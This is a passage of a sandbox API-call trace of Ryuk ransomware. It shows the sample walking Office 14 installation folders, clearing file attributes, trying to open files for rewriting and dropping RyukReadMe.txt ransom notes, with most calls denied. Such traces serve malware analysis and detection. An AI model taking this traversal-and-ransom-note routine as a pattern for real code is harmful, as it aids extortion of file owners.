| out: lpFindFileData=0x29aca90) returned 1 [0131.711] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.711] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.711] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.711] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.711] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.711] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.712] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MUAUTH.CAB", dwFileAttributes=0x80) returned 0 [0131.712] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MUAUTH.CAB" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\muauth.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.712] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.712] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.713] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.713] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.713] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.713] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.713] SetLastError (dwErrCode=0x0) [0131.713] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.713] GetLastError () returned 0x5 [0131.713] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0131.713] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.713] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0131.714] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.715] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.715] SetLastError (dwErrCode=0x0) [0131.715] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.715] GetLastError () returned 0x5 [0131.715] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0131.715] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.715] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3bb540 [0131.717] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0131.717] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0131.717] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.718] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML", dwFileAttributes=0x80) returned 0 [0131.718] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\accessmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.718] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.718] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.718] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0131.718] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.718] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML", dwFileAttributes=0x80) returned 0 [0131.719] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\accessmuiset.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.719] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.719] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.719] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0131.719] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.719] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML", dwFileAttributes=0x80) returned 0 [0131.720] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.720] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.720] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.720] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0131.720] FindClose (in: hFindFile=0x3bb540 | out: hFindFile=0x3bb540) returned 1 [0131.721] SetLastError (dwErrCode=0x0) [0131.721] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.723] GetLastError () returned 0x5 [0131.724] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0131.724] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.724] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.724] SetLastError (dwErrCode=0x0) [0131.724] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.724] GetLastError () returned 0x5 [0131.724] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0131.724] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.724] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3bb540 [0131.725] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0131.725] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0131.725] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.725] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML", dwFileAttributes=0x80) returned 0 [0131.725] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\excel.en-us\\excelmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.725] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.725] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.725] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0131.725] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.726] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML", dwFileAttributes=0x80) returned 0 [0131.726] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\excel.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.726] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.726] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.726] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0131.726] FindClose (in: hFindFile=0x3bb540 | out: hFindFile=0x3bb540) returned 1 [0131.726] SetLastError (dwErrCode=0x0) [0131.727] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\excel.en-us\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.727] GetLastError () returned 0x5 [0131.727] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0131.727] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.727] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.727] SetLastError (dwErrCode=0x0) [0131.727] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.727] GetLastError () returned 0x5 [0131.727] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0131.727] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.727] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3bb540 [0131.730] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0131.730] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0131.730] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.730] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML", dwFileAttributes=0x80) returned 0 [0131.730] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\groove.en-us\\groovemui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.730] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.730] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.730] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0131.730] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.731] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML", dwFileAttributes=0x80) returned 0 [0131.731] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\groove.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.731] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.731] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.731] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0131.732] FindClose (in: hFindFile=0x3bb540 | out: hFindFile=0x3bb540) returned 1 [0131.732] SetLastError (dwErrCode=0x0) [0131.732] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\groove.en-us\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.732] GetLastError () returned 0x5 [0131.732] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0131.732] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.732] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.732] SetLastError (dwErrCode=0x0) [0131.732] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.732] GetLastError () returned 0x5 [0131.732] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0131.732] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.732] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3bb540 [0131.733] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0131.733] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0131.733] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.733] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML", dwFileAttributes=0x80) returned 0 [0131.733] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\infopath.en-us\\infopathmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.733] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.733] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.734] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0131.734] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.734] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML", dwFileAttributes=0x80) returned 0 [0131.734] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\infopath.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.734] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.734] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.734] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0131.734] FindClose (in: hFindFile=0x3bb540 | out: hFindFile=0x3bb540) returned 1 [0131.734] SetLastError (dwErrCode=0x0) [0131.734] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\infopath.en-us\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.734] GetLastError () returned 0x5 [0131.734] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0131.734] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.734] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.734] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.735] SetLastError (dwErrCode=0x0) [0131.735] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.735] GetLastError () returned 0x5 [0131.735] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0131.735] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.735] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3bb540 [0131.737] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0131.737] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0131.737] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0131.737] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.737] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML", dwFileAttributes=0x80) returned 0 [0131.737] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\branding.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.738] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.738] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.738] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0131.738] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.738] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM", dwFileAttributes=0x80) returned 0 [0131.739] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\oct.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.739] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.739] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.739] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0131.739] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.739] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML", dwFileAttributes=0x80) returned 0 [0131.739] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\officemui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.739] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.739] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.739] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0131.739] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.740] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML", dwFileAttributes=0x80) returned 0 [0131.740] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\officemuiset.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.740] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.740] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.740] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0131.740] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0131.740] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0131.740] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.740] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup 